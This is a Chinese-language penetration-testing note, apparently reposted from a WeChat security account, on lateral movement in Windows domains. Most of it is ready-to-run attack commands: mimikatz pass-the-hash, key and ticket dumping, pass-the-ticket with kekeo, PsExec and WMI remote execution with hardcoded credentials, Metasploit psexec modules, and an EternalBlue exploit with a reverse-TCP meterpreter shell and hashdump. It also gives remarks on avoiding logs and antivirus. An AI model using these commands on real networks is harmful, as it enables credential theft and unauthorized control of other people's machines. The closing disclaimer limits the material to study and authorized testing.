1、概述
本篇文章续记内网渗透方面域内横向移动技术。
2、内容
2.1 哈希传递攻击
拿到目标计算机的用户明文密码或者NTLM Hash后,可通过PTH(pass the hash 凭据传递)的方法,将散列值或明文密码传送到目标机器进行验证。
使用NTLM Hash进行哈希传递
以管理员权限运行mimikatz,然后输入命令:
mimikatz "privilege::debug" "sekurlsa::pth" /user:administrator /domain:sahx.com /ntlm:E3G49887D6588H5F6E345627这时候会弹出cmd.exe,可以执行命令获取域控制器信息。
使用AES-256密钥进行哈希传递
先使用mimikatz抓取密钥
mimikatz "privilege::debug" "sekurlsa::ekeys"然后进行哈希传递
mimikatz "privilege::debug" "sekurlsa::pth" /user:administrator /domain:sahx.com /aes256:密钥字符串使用AES-256密钥进行哈希传递的前提是安装KB2871997补丁。
KB2871997补丁禁止通过本地管理员权限与远程计算机进行连接,无法通过本地管理员权限对远程计算机使用PsExec、WMI、smbexec、schtasks、at,也无法访问远程主机的共享文件等。更新补丁后无法使用常规的哈希传递方法进行横向移动,但SID为500除外即administrator账号。
2.2 票据传递攻击
使用mimikatz进行票据传递
使用mimikatz哈希传递,必须具有本地管理员权限,mimikatz也提供不需要本地管理员权限进行渗透测试的方法,例如票据传递(PTT)。
导出票据
mimikatz "privilege::debug" "sekurlsa::tickets" /export执行命令,导出多个服务票据文件,清除内存中的票据,命令如下:
kerberos::purge将票据文件注入内存:
mimikatz "kerberos::ptt" "C:ticket[0;4f7cf]-2-0-60a00000-administrator@krbtgt-SAHX.COM.kirbi"将高权限票据文件注入内存后,可执行远程计算机命令。
使用kekeo进行票据传递
使用开源工具kekeo实现票据传递
下载地址:https://github.com/gentilkiwi/kekeo生成票据文件:
kekeo "tgt::ask" /user:administrator /domain:sahx.com /ntlm:ntlm字符串生成票据文件后,清除内存中其他票据
kerberos::purgeWindows系统命令也可清除
klist purge将生成票据导入:
kerberos::ptt 生成票据文件的名称导入后,exit退出kekeo,然后执行远程主机命令。
2.3 PsExec使用(一般杀毒会报)
PsExec可以在Vista/NT 4.0/2000/XP/Server 2003/Server 2008/Server 2012/Server2016上运行。
工具下载地址,PStools中包含PsExec:
https://download.sysinternals.com/files/PSTools.zip首先获取目标操作系统的交互式shell,在建立IPC$的情况下,执行如下命令,获取System权限的shell
PsExec.exe -accepteula \192.168.127.130 -s cmd.exe-accepteula:禁止弹出确认框-s 以system权限运行远程进程
获取administrator权限的的shell
PsExec.exe -accepteula \192.168.127.130 cmd.exe如果没有建立IPC$,可以进行远程连接
PsExec.exe \192.168.127.130 -u testuser -p 1 cmd.exe使用PsExec在远程计算机上进行回显
PsExec.exe \192.168.127.130 -u testuser -p 1 cmd.exe /c "ipconfig"此工具会产生大量日志,攻击时慎用。
Metasploit中的psexec模块
search psexec一般使用的模块exploit/windows/smb/psexec(生成exe版payload)exploit/windows/smb/psexec_psh(psexec的powershell版本)use exploit/windows/smb/psexecset rhost 192.168.127.130set smbuser testuserset smbpass 1exploit
2.4 WMI使用
WMI:Windows Management Instrumentation是Windows中用于提供共同的界面和对象模式以便访问有关操作系统、设备、应用程序和服务的管理信息。如果此服务被终止,多数基于 Windows 的软件将无法正常运行。如果此服务被禁用,任何依赖它的服务将无法启动。
基本命令
wmic /node:192.168.127.130 /user:testuser /password:1 process call create "cmd.exe /c ipconfig >ip.txt"
WMIC远程执行系统命令,wmic无回显使用ipc$和type查看执行命令,执行恶意程序不会写入日志。
impacket工具中的wmiexec
linux中下载安装impacket工具包。
wmiexec.vbs
执行命令会报毒
可在远程系统中执行命令并进行回显,获得远程主机的半交互式shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.127.130 testuser 1wmicexrc.vbs下载地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs
执行后杀毒直接会杀掉vbs文件。
在远程主机上执行命令
cscript.exe wmiexec.vbs /cmd 192.168.127.130 testuser 1 "ipconfig"Invoke-WmiCommand
Invoke-WmiCommand.ps1脚本包含在powersploit工具中。
powershell命令环境执行命令:
目标系统用户名$USER = "sahxadministrator"目标系统密码$Password = ConvertTo-SecureString -String "sahx@123" -AsPlainText -Force将账号密码整合起来,导入Credential$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $USER , $Password远程执行命令$Remote = Invoke-WmiCommand -Payload {ipcofnig} -Credential $Cred -ComputerName 192.168.127.130将执行结果输出到屏幕上$Remote.PayloadOutput
Invoke-WMIMethod
利用powershell自带Invoke-WMIMethod,可以非交互式的方式执行命令,但不会回显执行结果
目标系统用户名$USER = "sahxadministrator"目标系统密码$Password = ConvertTo-SecureString -String "sahx@123" -AsPlainText -Force将账号密码整合起来,导入Credential$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $USER , $Password远程执行命令Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "clac.exe" -ComputerName "192.168.127.130" -Credential $Cred
2.5 永恒之蓝漏洞
使用metasploit
漏洞检测search ms17-010use auxiliary/scanner/smb/smb_ms17_010set rhost 192.168.127.130set threads 50exploit
漏洞利用
use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.127.130set payload windows/x64/meterpreter/reverse_tcpexploit
执行后获取meterpreter shell,然后获取权限
getuid
抓取系统用户散列值
hashdump
免责声明:
本公众号漏洞复现文章,SRC、渗透测试等文章,仅供学习参考,请勿用于实战!!有授权情况下除外!!由于传播、利用本公众号文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责
原文始发于微信公众号(sahx安全从业记):内网(笔记)-域内横向移动-续
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论